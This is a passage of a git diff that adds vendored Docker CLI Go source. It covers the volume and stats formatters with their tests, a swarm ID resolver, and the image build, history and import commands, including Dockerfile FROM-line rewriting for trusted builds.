-- +`, + }, + { + Context{Format: "{{.Container}} {{.MemPerc}} {{.PIDs}}"}, + `container1 -- -- +container2 -- -- +`, + }, + } + + for _, te := range tt { + stats := []StatsEntry{ + { + Container: "container1", + CPUPercentage: 20, + Memory: 20, + MemoryLimit: 20, + MemoryPercentage: 20, + NetworkRx: 20, + NetworkTx: 20, + BlockRead: 20, + BlockWrite: 20, + PidsCurrent: 2, + IsInvalid: false, + OSType: "windows", + }, + { + Container: "container2", + CPUPercentage: 30, + Memory: 30, + MemoryLimit: 30, + MemoryPercentage: 30, + NetworkRx: 30, + NetworkTx: 30, + BlockRead: 30, + BlockWrite: 30, + PidsCurrent: 3, + IsInvalid: true, + OSType: "windows", + }, + } + var out bytes.Buffer + te.context.Output = &out + err := ContainerStatsWrite(te.context, stats) + if err != nil { + assert.Error(t, err, te.expected) + } else { + assert.Equal(t, out.String(), te.expected) + } + } +} + +func TestContainerStatsContextWriteWithNoStats(t *testing.T) { + var out bytes.Buffer + + contexts := []struct { + context Context + expected string + }{ + { + Context{ + Format: "{{.Container}}", + Output: &out, + }, + "", + }, + { + Context{ + Format: "table {{.Container}}", + Output: &out, + }, + "CONTAINER\n", + }, + { + Context{ + Format: "table {{.Container}}\t{{.CPUPerc}}", + Output: &out, + }, + "CONTAINER CPU %\n", + }, + } + + for _, context := range contexts { + ContainerStatsWrite(context.context, []StatsEntry{}) + assert.Equal(t, context.expected, out.String()) + // Clean buffer + out.Reset() + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume.go b/vendor/github.com/docker/docker/cli/command/formatter/volume.go new file mode 100644 index 0000000000..90c9b13536 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/volume.go @@ -0,0 +1,121 @@ +package formatter + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" + units "github.com/docker/go-units" +) + +const ( + defaultVolumeQuietFormat = "{{.Name}}" + defaultVolumeTableFormat = "table {{.Driver}}\t{{.Name}}" + + volumeNameHeader = "VOLUME NAME" + mountpointHeader = "MOUNTPOINT" + linksHeader = "LINKS" + // Status header ? +) + +// NewVolumeFormat returns a format for use with a volume Context +func NewVolumeFormat(source string, quiet bool) Format { + switch source { + case TableFormatKey: + if quiet { + return defaultVolumeQuietFormat + } + return defaultVolumeTableFormat + case RawFormatKey: + if quiet { + return `name: {{.Name}}` + } + return `name: {{.Name}}\ndriver: {{.Driver}}\n` + } + return Format(source) +} + +// VolumeWrite writes formatted volumes using the Context +func VolumeWrite(ctx Context, volumes []*types.Volume) error { + render := func(format func(subContext subContext) error) error { + for _, volume := range volumes { + if err := format(&volumeContext{v: *volume}); err != nil { + return err + } + } + return nil + } + return ctx.Write(&volumeContext{}, render) +} + +type volumeContext struct { + HeaderContext + v types.Volume +} + +func (c *volumeContext) MarshalJSON() ([]byte, error) { + return marshalJSON(c) +} + +func (c *volumeContext) Name() string { + c.AddHeader(volumeNameHeader) + return c.v.Name +} + +func (c *volumeContext) Driver() string { + c.AddHeader(driverHeader) + return c.v.Driver +} + +func (c *volumeContext) Scope() string { + c.AddHeader(scopeHeader) + return c.v.Scope +} + +func (c *volumeContext) Mountpoint() string { + c.AddHeader(mountpointHeader) + return c.v.Mountpoint +} + +func (c *volumeContext) Labels() string { + c.AddHeader(labelsHeader) + if c.v.Labels == nil { + return "" + } + + var joinLabels []string + for k, v := range c.v.Labels { + joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) + } + return strings.Join(joinLabels, ",") +} + +func (c *volumeContext) Label(name string) string { + + n := strings.Split(name, ".") + r := strings.NewReplacer("-", " ", "_", " ") + h := r.Replace(n[len(n)-1]) + + c.AddHeader(h) + + if c.v.Labels == nil { + return "" + } + return c.v.Labels[name] +} + +func (c *volumeContext) Links() string { + c.AddHeader(linksHeader) + if c.v.UsageData == nil { + return "N/A" + } + return fmt.Sprintf("%d", c.v.UsageData.RefCount) +} + +func (c *volumeContext) Size() string { + c.AddHeader(sizeHeader) + if c.v.UsageData == nil { + return "N/A" + } + return units.HumanSize(float64(c.v.UsageData.Size)) +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go b/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go new file mode 100644 index 0000000000..9ec18b6916 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go @@ -0,0 +1,189 @@ +package formatter + +import ( + "bytes" + "encoding/json" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestVolumeContext(t *testing.T) { + volumeName := stringid.GenerateRandomID() + + var ctx volumeContext + cases := []struct { + volumeCtx volumeContext + expValue string + expHeader string + call func() string + }{ + {volumeContext{ + v: types.Volume{Name: volumeName}, + }, volumeName, volumeNameHeader, ctx.Name}, + {volumeContext{ + v: types.Volume{Driver: "driver_name"}, + }, "driver_name", driverHeader, ctx.Driver}, + {volumeContext{ + v: types.Volume{Scope: "local"}, + }, "local", scopeHeader, ctx.Scope}, + {volumeContext{ + v: types.Volume{Mountpoint: "mountpoint"}, + }, "mountpoint", mountpointHeader, ctx.Mountpoint}, + {volumeContext{ + v: types.Volume{}, + }, "", labelsHeader, ctx.Labels}, + {volumeContext{ + v: types.Volume{Labels: map[string]string{"label1": "value1", "label2": "value2"}}, + }, "label1=value1,label2=value2", labelsHeader, ctx.Labels}, + } + + for _, c := range cases { + ctx = c.volumeCtx + v := c.call() + if strings.Contains(v, ",") { + compareMultipleValues(t, v, c.expValue) + } else if v != c.expValue { + t.Fatalf("Expected %s, was %s\n", c.expValue, v) + } + + h := ctx.FullHeader() + if h != c.expHeader { + t.Fatalf("Expected %s, was %s\n", c.expHeader, h) + } + } +} + +func TestVolumeContextWrite(t *testing.T) { + cases := []struct { + context Context + expected string + }{ + + // Errors + { + Context{Format: "{{InvalidFunction}}"}, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + Context{Format: "{{nil}}"}, + `Template parsing error: template: :1:2: executing "" at : nil is not a command +`, + }, + // Table format + { + Context{Format: NewVolumeFormat("table", false)}, + `DRIVER VOLUME NAME +foo foobar_baz +bar foobar_bar +`, + }, + { + Context{Format: NewVolumeFormat("table", true)}, + `foobar_baz +foobar_bar +`, + }, + { + Context{Format: NewVolumeFormat("table {{.Name}}", false)}, + `VOLUME NAME +foobar_baz +foobar_bar +`, + }, + { + Context{Format: NewVolumeFormat("table {{.Name}}", true)}, + `VOLUME NAME +foobar_baz +foobar_bar +`, + }, + // Raw Format + { + Context{Format: NewVolumeFormat("raw", false)}, + `name: foobar_baz +driver: foo + +name: foobar_bar +driver: bar + +`, + }, + { + Context{Format: NewVolumeFormat("raw", true)}, + `name: foobar_baz +name: foobar_bar +`, + }, + // Custom Format + { + Context{Format: NewVolumeFormat("{{.Name}}", false)}, + `foobar_baz +foobar_bar +`, + }, + } + + for _, testcase := range cases { + volumes := []*types.Volume{ + {Name: "foobar_baz", Driver: "foo"}, + {Name: "foobar_bar", Driver: "bar"}, + } + out := bytes.NewBufferString("") + testcase.context.Output = out + err := VolumeWrite(testcase.context, volumes) + if err != nil { + assert.Error(t, err, testcase.expected) + } else { + assert.Equal(t, out.String(), testcase.expected) + } + } +} + +func TestVolumeContextWriteJSON(t *testing.T) { + volumes := []*types.Volume{ + {Driver: "foo", Name: "foobar_baz"}, + {Driver: "bar", Name: "foobar_bar"}, + } + expectedJSONs := []map[string]interface{}{ + {"Driver": "foo", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_baz", "Scope": "", "Size": "N/A"}, + {"Driver": "bar", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_bar", "Scope": "", "Size": "N/A"}, + } + out := bytes.NewBufferString("") + err := VolumeWrite(Context{Format: "{{json .}}", Output: out}, volumes) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var m map[string]interface{} + if err := json.Unmarshal([]byte(line), &m); err != nil { + t.Fatal(err) + } + assert.DeepEqual(t, m, expectedJSONs[i]) + } +} + +func TestVolumeContextWriteJSONField(t *testing.T) { + volumes := []*types.Volume{ + {Driver: "foo", Name: "foobar_baz"}, + {Driver: "bar", Name: "foobar_bar"}, + } + out := bytes.NewBufferString("") + err := VolumeWrite(Context{Format: "{{json .Name}}", Output: out}, volumes) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var s string + if err := json.Unmarshal([]byte(line), &s); err != nil { + t.Fatal(err) + } + assert.Equal(t, s, volumes[i].Name) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go b/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go new file mode 100644 index 0000000000..511b1a8f54 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go @@ -0,0 +1,90 @@ +package idresolver + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stringid" +) + +// IDResolver provides ID to Name resolution. +type IDResolver struct { + client client.APIClient + noResolve bool + cache map[string]string +} + +// New creates a new IDResolver. +func New(client client.APIClient, noResolve bool) *IDResolver { + return &IDResolver{ + client: client, + noResolve: noResolve, + cache: make(map[string]string), + } +} + +func (r *IDResolver) get(ctx context.Context, t interface{}, id string) (string, error) { + switch t := t.(type) { + case swarm.Node: + node, _, err := r.client.NodeInspectWithRaw(ctx, id) + if err != nil { + return id, nil + } + if node.Spec.Annotations.Name != "" { + return node.Spec.Annotations.Name, nil + } + if node.Description.Hostname != "" { + return node.Description.Hostname, nil + } + return id, nil + case swarm.Service: + service, _, err := r.client.ServiceInspectWithRaw(ctx, id) + if err != nil { + return id, nil + } + return service.Spec.Annotations.Name, nil + case swarm.Task: + // If the caller passes the full task there's no need to do a lookup. + if t.ID == "" { + var err error + + t, _, err = r.client.TaskInspectWithRaw(ctx, id) + if err != nil { + return id, nil + } + } + taskID := stringid.TruncateID(t.ID) + if t.ServiceID == "" { + return taskID, nil + } + service, err := r.Resolve(ctx, swarm.Service{}, t.ServiceID) + if err != nil { + return "", err + } + return fmt.Sprintf("%s.%d.%s", service, t.Slot, taskID), nil + default: + return "", fmt.Errorf("unsupported type") + } + +} + +// Resolve will attempt to resolve an ID to a Name by querying the manager. +// Results are stored into a cache. +// If the `-n` flag is used in the command-line, resolution is disabled. +func (r *IDResolver) Resolve(ctx context.Context, t interface{}, id string) (string, error) { + if r.noResolve { + return id, nil + } + if name, ok := r.cache[id]; ok { + return name, nil + } + name, err := r.get(ctx, t, id) + if err != nil { + return "", err + } + r.cache[id] = name + return name, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/image/build.go b/vendor/github.com/docker/docker/cli/command/image/build.go new file mode 100644 index 0000000000..0c88af5fcd --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/build.go @@ -0,0 +1,477 @@ +package image + +import ( + "archive/tar" + "bufio" + "bytes" + "fmt" + "io" + "os" + "path/filepath" + "regexp" + "runtime" + + "golang.org/x/net/context" + + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerignore" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/urlutil" + "github.com/docker/docker/reference" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type buildOptions struct { + context string + dockerfileName string + tags opts.ListOpts + labels opts.ListOpts + buildArgs opts.ListOpts + ulimits *runconfigopts.UlimitOpt + memory string + memorySwap string + shmSize string + cpuShares int64 + cpuPeriod int64 + cpuQuota int64 + cpuSetCpus string + cpuSetMems string + cgroupParent string + isolation string + quiet bool + noCache bool + rm bool + forceRm bool + pull bool + cacheFrom []string + compress bool + securityOpt []string + networkMode string + squash bool +} + +// NewBuildCommand creates a new `docker build` command +func NewBuildCommand(dockerCli *command.DockerCli) *cobra.Command { + ulimits := make(map[string]*units.Ulimit) + options := buildOptions{ + tags: opts.NewListOpts(validateTag), + buildArgs: opts.NewListOpts(runconfigopts.ValidateEnv), + ulimits: runconfigopts.NewUlimitOpt(&ulimits), + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + } + + cmd := &cobra.Command{ + Use: "build [OPTIONS] PATH | URL | -", + Short: "Build an image from a Dockerfile", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + options.context = args[0] + return runBuild(dockerCli, options) + }, + } + + flags := cmd.Flags() + + flags.VarP(&options.tags, "tag", "t", "Name and optionally a tag in the 'name:tag' format") + flags.Var(&options.buildArgs, "build-arg", "Set build-time variables") + flags.Var(options.ulimits, "ulimit", "Ulimit options") + flags.StringVarP(&options.dockerfileName, "file", "f", "", "Name of the Dockerfile (Default is 'PATH/Dockerfile')") + flags.StringVarP(&options.memory, "memory", "m", "", "Memory limit") + flags.StringVar(&options.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") + flags.StringVar(&options.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB") + flags.Int64VarP(&options.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") + flags.Int64Var(&options.cpuPeriod, "cpu-period", 0, "Limit the CPU CFS (Completely Fair Scheduler) period") + flags.Int64Var(&options.cpuQuota, "cpu-quota", 0, "Limit the CPU CFS (Completely Fair Scheduler) quota") + flags.StringVar(&options.cpuSetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") + flags.StringVar(&options.cpuSetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") + flags.StringVar(&options.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container") + flags.StringVar(&options.isolation, "isolation", "", "Container isolation technology") + flags.Var(&options.labels, "label", "Set metadata for an image") + flags.BoolVar(&options.noCache, "no-cache", false, "Do not use cache when building the image") + flags.BoolVar(&options.rm, "rm", true, "Remove intermediate containers after a successful build") + flags.BoolVar(&options.forceRm, "force-rm", false, "Always remove intermediate containers") + flags.BoolVarP(&options.quiet, "quiet", "q", false, "Suppress the build output and print image ID on success") + flags.BoolVar(&options.pull, "pull", false, "Always attempt to pull a newer version of the image") + flags.StringSliceVar(&options.cacheFrom, "cache-from", []string{}, "Images to consider as cache sources") + flags.BoolVar(&options.compress, "compress", false, "Compress the build context using gzip") + flags.StringSliceVar(&options.securityOpt, "security-opt", []string{}, "Security options") + flags.StringVar(&options.networkMode, "network", "default", "Set the networking mode for the RUN instructions during build") + + command.AddTrustedFlags(flags, true) + + flags.BoolVar(&options.squash, "squash", false, "Squash newly built layers into a single new layer") + flags.SetAnnotation("squash", "experimental", nil) + flags.SetAnnotation("squash", "version", []string{"1.25"}) + + return cmd +} + +// lastProgressOutput is the same as progress.Output except +// that it only output with the last update. It is used in +// non terminal scenarios to depresss verbose messages +type lastProgressOutput struct { + output progress.Output +} + +// WriteProgress formats progress information from a ProgressReader. +func (out *lastProgressOutput) WriteProgress(prog progress.Progress) error { + if !prog.LastUpdate { + return nil + } + + return out.output.WriteProgress(prog) +} + +func runBuild(dockerCli *command.DockerCli, options buildOptions) error { + + var ( + buildCtx io.ReadCloser + err error + contextDir string + tempDir string + relDockerfile string + progBuff io.Writer + buildBuff io.Writer + ) + + specifiedContext := options.context + progBuff = dockerCli.Out() + buildBuff = dockerCli.Out() + if options.quiet { + progBuff = bytes.NewBuffer(nil) + buildBuff = bytes.NewBuffer(nil) + } + + switch { + case specifiedContext == "-": + buildCtx, relDockerfile, err = builder.GetContextFromReader(dockerCli.In(), options.dockerfileName) + case urlutil.IsGitURL(specifiedContext): + tempDir, relDockerfile, err = builder.GetContextFromGitURL(specifiedContext, options.dockerfileName) + case urlutil.IsURL(specifiedContext): + buildCtx, relDockerfile, err = builder.GetContextFromURL(progBuff, specifiedContext, options.dockerfileName) + default: + contextDir, relDockerfile, err = builder.GetContextFromLocalDir(specifiedContext, options.dockerfileName) + } + + if err != nil { + if options.quiet && urlutil.IsURL(specifiedContext) { + fmt.Fprintln(dockerCli.Err(), progBuff) + } + return fmt.Errorf("unable to prepare context: %s", err) + } + + if tempDir != "" { + defer os.RemoveAll(tempDir) + contextDir = tempDir + } + + if buildCtx == nil { + // And canonicalize dockerfile name to a platform-independent one + relDockerfile, err = archive.CanonicalTarNameForPath(relDockerfile) + if err != nil { + return fmt.Errorf("cannot canonicalize dockerfile path %s: %v", relDockerfile, err) + } + + f, err := os.Open(filepath.Join(contextDir, ".dockerignore")) + if err != nil && !os.IsNotExist(err) { + return err + } + defer f.Close() + + var excludes []string + if err == nil { + excludes, err = dockerignore.ReadAll(f) + if err != nil { + return err + } + } + + if err := builder.ValidateContextDirectory(contextDir, excludes); err != nil { + return fmt.Errorf("Error checking context: '%s'.", err) + } + + // If .dockerignore mentions .dockerignore or the Dockerfile + // then make sure we send both files over to the daemon + // because Dockerfile is, obviously, needed no matter what, and + // .dockerignore is needed to know if either one needs to be + // removed. The daemon will remove them for us, if needed, after it + // parses the Dockerfile. Ignore errors here, as they will have been + // caught by validateContextDirectory above. + var includes = []string{"."} + keepThem1, _ := fileutils.Matches(".dockerignore", excludes) + keepThem2, _ := fileutils.Matches(relDockerfile, excludes) + if keepThem1 || keepThem2 { + includes = append(includes, ".dockerignore", relDockerfile) + } + + compression := archive.Uncompressed + if options.compress { + compression = archive.Gzip + } + buildCtx, err = archive.TarWithOptions(contextDir, &archive.TarOptions{ + Compression: compression, + ExcludePatterns: excludes, + IncludeFiles: includes, + }) + if err != nil { + return err + } + } + + ctx := context.Background() + + var resolvedTags []*resolvedTag + if command.IsTrusted() { + translator := func(ctx context.Context, ref reference.NamedTagged) (reference.Canonical, error) { + return TrustedReference(ctx, dockerCli, ref, nil) + } + // Wrap the tar archive to replace the Dockerfile entry with the rewritten + // Dockerfile which uses trusted pulls. + buildCtx = replaceDockerfileTarWrapper(ctx, buildCtx, relDockerfile, translator, &resolvedTags) + } + + // Setup an upload progress bar + progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(progBuff, true) + if !dockerCli.Out().IsTerminal() { + progressOutput = &lastProgressOutput{output: progressOutput} + } + + var body io.Reader = progress.NewProgressReader(buildCtx, progressOutput, 0, "", "Sending build context to Docker daemon") + + var memory int64 + if options.memory != "" { + parsedMemory, err := units.RAMInBytes(options.memory) + if err != nil { + return err + } + memory = parsedMemory + } + + var memorySwap int64 + if options.memorySwap != "" { + if options.memorySwap == "-1" { + memorySwap = -1 + } else { + parsedMemorySwap, err := units.RAMInBytes(options.memorySwap) + if err != nil { + return err + } + memorySwap = parsedMemorySwap + } + } + + var shmSize int64 + if options.shmSize != "" { + shmSize, err = units.RAMInBytes(options.shmSize) + if err != nil { + return err + } + } + + authConfigs, _ := dockerCli.GetAllCredentials() + buildOptions := types.ImageBuildOptions{ + Memory: memory, + MemorySwap: memorySwap, + Tags: options.tags.GetAll(), + SuppressOutput: options.quiet, + NoCache: options.noCache, + Remove: options.rm, + ForceRemove: options.forceRm, + PullParent: options.pull, + Isolation: container.Isolation(options.isolation), + CPUSetCPUs: options.cpuSetCpus, + CPUSetMems: options.cpuSetMems, + CPUShares: options.cpuShares, + CPUQuota: options.cpuQuota, + CPUPeriod: options.cpuPeriod, + CgroupParent: options.cgroupParent, + Dockerfile: relDockerfile, + ShmSize: shmSize, + Ulimits: options.ulimits.GetList(), + BuildArgs: runconfigopts.ConvertKVStringsToMapWithNil(options.buildArgs.GetAll()), + AuthConfigs: authConfigs, + Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()), + CacheFrom: options.cacheFrom, + SecurityOpt: options.securityOpt, + NetworkMode: options.networkMode, + Squash: options.squash, + } + + response, err := dockerCli.Client().ImageBuild(ctx, body, buildOptions) + if err != nil { + if options.quiet { + fmt.Fprintf(dockerCli.Err(), "%s", progBuff) + } + return err + } + defer response.Body.Close() + + err = jsonmessage.DisplayJSONMessagesStream(response.Body, buildBuff, dockerCli.Out().FD(), dockerCli.Out().IsTerminal(), nil) + if err != nil { + if jerr, ok := err.(*jsonmessage.JSONError); ok { + // If no error code is set, default to 1 + if jerr.Code == 0 { + jerr.Code = 1 + } + if options.quiet { + fmt.Fprintf(dockerCli.Err(), "%s%s", progBuff, buildBuff) + } + return cli.StatusError{Status: jerr.Message, StatusCode: jerr.Code} + } + } + + // Windows: show error message about modified file permissions if the + // daemon isn't running Windows. + if response.OSType != "windows" && runtime.GOOS == "windows" && !options.quiet { + fmt.Fprintln(dockerCli.Err(), `SECURITY WARNING: You are building a Docker image from Windows against a non-Windows Docker host. All files and directories added to build context will have '-rwxr-xr-x' permissions. It is recommended to double check and reset permissions for sensitive files and directories.`) + } + + // Everything worked so if -q was provided the output from the daemon + // should be just the image ID and we'll print that to stdout. + if options.quiet { + fmt.Fprintf(dockerCli.Out(), "%s", buildBuff) + } + + if command.IsTrusted() { + // Since the build was successful, now we must tag any of the resolved + // images from the above Dockerfile rewrite. + for _, resolved := range resolvedTags { + if err := TagTrusted(ctx, dockerCli, resolved.digestRef, resolved.tagRef); err != nil { + return err + } + } + } + + return nil +} + +type translatorFunc func(context.Context, reference.NamedTagged) (reference.Canonical, error) + +// validateTag checks if the given image name can be resolved. +func validateTag(rawRepo string) (string, error) { + _, err := reference.ParseNamed(rawRepo) + if err != nil { + return "", err + } + + return rawRepo, nil +} + +var dockerfileFromLinePattern = regexp.MustCompile(`(?i)^[\s]*FROM[ \f\r\t\v]+(?P[^ \f\r\t\v\n#]+)`) + +// resolvedTag records the repository, tag, and resolved digest reference +// from a Dockerfile rewrite. +type resolvedTag struct { + digestRef reference.Canonical + tagRef reference.NamedTagged +} + +// rewriteDockerfileFrom rewrites the given Dockerfile by resolving images in +// "FROM " instructions to a digest reference. `translator` is a +// function that takes a repository name and tag reference and returns a +// trusted digest reference. +func rewriteDockerfileFrom(ctx context.Context, dockerfile io.Reader, translator translatorFunc) (newDockerfile []byte, resolvedTags []*resolvedTag, err error) { + scanner := bufio.NewScanner(dockerfile) + buf := bytes.NewBuffer(nil) + + // Scan the lines of the Dockerfile, looking for a "FROM" line. + for scanner.Scan() { + line := scanner.Text() + + matches := dockerfileFromLinePattern.FindStringSubmatch(line) + if matches != nil && matches[1] != api.NoBaseImageSpecifier { + // Replace the line with a resolved "FROM repo@digest" + ref, err := reference.ParseNamed(matches[1]) + if err != nil { + return nil, nil, err + } + ref = reference.WithDefaultTag(ref) + if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() { + trustedRef, err := translator(ctx, ref) + if err != nil { + return nil, nil, err + } + + line = dockerfileFromLinePattern.ReplaceAllLiteralString(line, fmt.Sprintf("FROM %s", trustedRef.String())) + resolvedTags = append(resolvedTags, &resolvedTag{ + digestRef: trustedRef, + tagRef: ref, + }) + } + } + + _, err := fmt.Fprintln(buf, line) + if err != nil { + return nil, nil, err + } + } + + return buf.Bytes(), resolvedTags, scanner.Err() +} + +// replaceDockerfileTarWrapper wraps the given input tar archive stream and +// replaces the entry with the given Dockerfile name with the contents of the +// new Dockerfile. Returns a new tar archive stream with the replaced +// Dockerfile. +func replaceDockerfileTarWrapper(ctx context.Context, inputTarStream io.ReadCloser, dockerfileName string, translator translatorFunc, resolvedTags *[]*resolvedTag) io.ReadCloser { + pipeReader, pipeWriter := io.Pipe() + go func() { + tarReader := tar.NewReader(inputTarStream) + tarWriter := tar.NewWriter(pipeWriter) + + defer inputTarStream.Close() + + for { + hdr, err := tarReader.Next() + if err == io.EOF { + // Signals end of archive. + tarWriter.Close() + pipeWriter.Close() + return + } + if err != nil { + pipeWriter.CloseWithError(err) + return + } + + content := io.Reader(tarReader) + if hdr.Name == dockerfileName { + // This entry is the Dockerfile. Since the tar archive was + // generated from a directory on the local filesystem, the + // Dockerfile will only appear once in the archive. + var newDockerfile []byte + newDockerfile, *resolvedTags, err = rewriteDockerfileFrom(ctx, content, translator) + if err != nil { + pipeWriter.CloseWithError(err) + return + } + hdr.Size = int64(len(newDockerfile)) + content = bytes.NewBuffer(newDockerfile) + } + + if err := tarWriter.WriteHeader(hdr); err != nil { + pipeWriter.CloseWithError(err) + return + } + + if _, err := io.Copy(tarWriter, content); err != nil { + pipeWriter.CloseWithError(err) + return + } + } + }() + + return pipeReader +} diff --git a/vendor/github.com/docker/docker/cli/command/image/cmd.go b/vendor/github.com/docker/docker/cli/command/image/cmd.go new file mode 100644 index 0000000000..c3ca61f85b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/cmd.go @@ -0,0 +1,33 @@ +package image + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewImageCommand returns a cobra command for `image` subcommands +func NewImageCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "image", + Short: "Manage images", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + NewBuildCommand(dockerCli), + NewHistoryCommand(dockerCli), + NewImportCommand(dockerCli), + NewLoadCommand(dockerCli), + NewPullCommand(dockerCli), + NewPushCommand(dockerCli), + NewSaveCommand(dockerCli), + NewTagCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + newInspectCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/image/history.go b/vendor/github.com/docker/docker/cli/command/image/history.go new file mode 100644 index 0000000000..91c8f75a63 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/history.go @@ -0,0 +1,99 @@ +package image + +import ( + "fmt" + "strconv" + "strings" + "text/tabwriter" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type historyOptions struct { + image string + + human bool + quiet bool + noTrunc bool +} + +// NewHistoryCommand creates a new `docker history` command +func NewHistoryCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts historyOptions + + cmd := &cobra.Command{ + Use: "history [OPTIONS] IMAGE", + Short: "Show the history of an image", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.image = args[0] + return runHistory(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.human, "human", "H", true, "Print sizes and dates in human readable format") + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + + return cmd +} + +func runHistory(dockerCli *command.DockerCli, opts historyOptions) error { + ctx := context.Background() + + history, err := dockerCli.Client().ImageHistory(ctx, opts.image) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) + + if opts.quiet { + for _, entry := range history { + if opts.noTrunc { + fmt.Fprintf(w, "%s\n", entry.ID) + } else { + fmt.Fprintf(w, "%s\n", stringid.TruncateID(entry.ID)) + } + } + w.Flush() + return nil + } + + var imageID string + var createdBy string + var created string + var size string + + fmt.Fprintln(w, "IMAGE\tCREATED\tCREATED BY\tSIZE\tCOMMENT") + for _, entry := range history { + imageID = entry.ID + createdBy = strings.Replace(entry.CreatedBy, "\t", " ", -1) + if !opts.noTrunc { + createdBy = stringutils.Ellipsis(createdBy, 45) + imageID = stringid.TruncateID(entry.ID) + } + + if opts.human { + created = units.HumanDuration(time.Now().UTC().Sub(time.Unix(entry.Created, 0))) + " ago" + size = units.HumanSizeWithPrecision(float64(entry.Size), 3) + } else { + created = time.Unix(entry.Created, 0).Format(time.RFC3339) + size = strconv.FormatInt(entry.Size, 10) + } + + fmt.Fprintf(w, "%s\t%s\t%s\t%s\t%s\n", imageID, created, createdBy, size, entry.Comment) + } + w.Flush() + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/image/import.go b/vendor/github.com/docker/docker/cli/command/image/import.go new file mode 100644 index 0000000000..60024fb53c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/import.go @@ -0,0 +1,88 @@ +package image + +import ( + "io" + "os" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + dockeropts "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/urlutil" + "github.com/spf13/cobra" +) + +type importOptions struct { + source string + reference string + changes dockeropts.ListOpts + message string +} + +// NewImportCommand creates a new `docker import` command +func NewImportCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts importOptions + + cmd := &cobra.Command{ + Use: "import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]", + Short: "Import the contents from a tarball to create a filesystem image", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.source = args[0] + if len(args) > 1 { + opts.reference = args[1] + } + return runImport(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + opts.changes = dockeropts.NewListOpts(nil) + flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image") + flags.StringVarP(&opts.message, "message", "m", "", "Set commit message for imported image") + + return cmd +} + +func runImport(dockerCli *command.DockerCli, opts importOptions) error { + var ( + in io.Reader + srcName = opts.source + 